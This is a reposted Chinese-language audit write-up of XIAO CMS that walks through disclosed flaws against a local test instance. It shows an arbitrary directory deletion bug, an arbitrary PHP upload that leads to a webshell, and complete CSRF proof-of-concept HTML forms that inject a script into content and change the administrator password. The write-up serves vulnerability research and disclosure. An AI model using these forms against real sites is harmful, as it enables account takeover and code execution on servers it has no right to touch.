XIAO CMS审计

栏目: 编程工具 · 发布时间: 7年前

内容简介:他没有判断referer是从哪里来的,可以随意csrf,举两个例子任意添加一个xss面板改管理员的密码

翻安全客的时候看到xiao cms爆了6个cve审计一下

XIAO CMS审计

任意目录删除

XIAO CMS审计

跟进一下database.php

看到action是import找到那个函数

XIAO CMS审计

可以看到 paths 这个post参数并没有对 ./ 进行过滤,可以进行任意文件删除,而且payload的paths参数应该是post=。=

放一个自己的目录测试一下

XIAO CMS审计

创建了一个 ckj123 的目录,试下能不能删除

XIAO CMS审计 XIAO CMS审计

成功

任意文件上传

XIAO CMS审计

很明显的可以看到uploadfile.php文件

找到上传文件的地方

所有的upload需要一个upload函数

XIAO CMS审计

看到他加载了一个叫做upload的类

然后获得了文件最后的扩展名,判断了是图片还是别的文件

跟进upload

XIAO CMS审计

跟进upload类

XIAO CMS审计

里面有个过滤的地方

XIAO CMS审计 XIAO CMS审计

获得后缀,跟限制的类型进行比较

XIAO CMS审计

可以看到这个type是需要自己传进去的

XIAO CMS审计

总共两个action

下面那个的type是规定死的

发现上面那个的type是需要自己传进去的这就可以传 php 文件了

XIAO CMS审计 
<html>
    <body>
    <form action="http://127.0.0.1:8080/admin/index.php?c=uploadfile&a=uploadify_upload&type=php&size=1000" method="post" enctype="multipart/form-data">
    <input type="file" name="file" />
    <input type="submit" name="submit" value="submit" />
    </form>
</body>
</html>

CVE给的payload不对。。

XIAO CMS审计

成功了,然后连接一下这个马

XIAO CMS审计

CSRF

他没有判断referer是从哪里来的,可以随意csrf,举两个例子

任意添加一个xss面板

<html>
  <body>
    <form action="http://127.0.0.1:8080/admin/index.php?c=content&a=add&catid=3" method="POST">
      <input type="hidden" name="data[catid]" value="3" />
      <input type="hidden" name="data[title]" value="test" />
      <input type="hidden" name="data[thumb]" value="" />
      <input type="hidden" name="data[keywords]" value="" />
      <input type="hidden" name="data[description]" value="" />
      <input type="hidden" name="data[content]" value="<script>alert(1)</script>" />
      <input type="hidden" name="data[xiao_auto_description]" value="1" />
      <input type="hidden" name="data[xiao_auto_thumb]" value="1" />
      <input type="hidden" name="data[xiao_download_image]" value="1" />
      <input type="hidden" name="data[time]" value="2018-11-02+15:05:43" />
      <input type="hidden" name="data[hits]" value="" />
      <input type="hidden" name="submit" value="提交" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

改管理员的密码

<form action="http://127.0.0.1:8080/admin/index.php?c=index&a=my" method="POST">       
<input type="hidden" name="data[password]" value="1234567">
<input type="hidden" name="submit" value="提交" />
<input type="submit" value="Submit request" />
</form>

后记

xss的漏洞没看,以后有空补上


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

码农书籍
马云内部讲话

马云内部讲话

阿里巴巴集团 / 红旗出版社 / 2010-12 / 28.00元

马云的话有什么其妙的地方? 为什么员工会把自己的CEO当作偶像? 世界都处在迷茫期,他如何确立阿里巴巴的价值观? 他怎样给已经是富翁的员工寻找新的激情? 风暴袭来,他怎么克服内心的恐惧? 他在互联网合纵连横的动机何在?一起来看看 《马云内部讲话》 这本书的介绍吧!

码农工具
在线进制转换器
在线进制转换器

各进制数互转换器

MD5 加密
MD5 加密

MD5 加密工具

Markdown 在线编辑器
Markdown 在线编辑器

Markdown 在线编辑器

  • New
  • 文章
  • 话题
  • 教程
    • 关注 码农网 公众号
    版权所有,保留一切权利!© 2018-2026 码农网 粤ICP备17054400号-3